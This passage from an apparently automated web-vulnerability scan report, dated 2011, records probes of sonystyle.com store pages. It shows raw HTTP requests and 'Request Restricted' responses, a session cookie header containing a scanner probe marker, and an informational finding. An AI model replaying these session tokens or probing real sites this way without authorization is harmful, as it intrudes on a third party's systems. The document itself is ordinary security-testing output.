Cookie: sifrFetch=true; s_vi=[CS]v1|2701AA430515874D-60000181000007CB[CE]; JSESSIONID=0000GBxzJ8ocWqxo7Twu8MoxGDb:14aelt0ld; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yvTBhIsIzJXeq0V1jN5EG7plRAA%3d%0a%3b2011%2d06%2d23+10%3a58%3a28%2e003%5f1308841107995%2d82466%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRP7uidpXvVAq2h%0aJC2GZox%2bEO9n57RB95%2fBJ6N%2fOyuJlvGbaiD7FrSmImcI6%2bWFUECX5dn2JvAzvA5MAH9zFwLDmQ%3d%3d; WC_GENERIC_ACTIVITYDATA=[1131585542%3atrue%3afalse%3a0%3aOJQ8PE3BCkIUlGMHsRAnJG9WJb4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; mbox=session#1308841090453-474854#1308844298|PC#1308841090453-474854.17#1310052038|check#true#1308842498; ensRefId=http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=17410958ILJeqRHT23LY; s_cc=true; s_visit=1; c_m=undefinedburpburp; s_channel=%5B%5B%27Other%27%2C%271308842437917%27%5D%5D; s_sq=%5B%5BB%5D%5D; TS5bbf46=cefc48127b1086f50e229f977108f9dea8a8150f8ba2300a4e0359c7; fsr.s={"v":1,"rid":"1308841108174_99949","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":3,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":3,"s":false}},"cd":0,"sd":0}; 71737897-VID=16101514677756; 71737897-SKEY=4916265021794629949; HumanClickSiteContainerID_71737897=STANDALONE

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:23:49 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182655</body></html>

19.2. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&identifier=S_Weekly_Deals&categoryKey=Computers HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 161
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Cache-Control: no-cache
Pragma: no-cache

<html><head><title>Request Restricted</title></head><body>The page you have requested is restricted.<br><br>Your support ID is: 9036114512303182439</body></html>

Report generated by XSS.CX at Thu Jun 23 10:54:06 CDT 2011.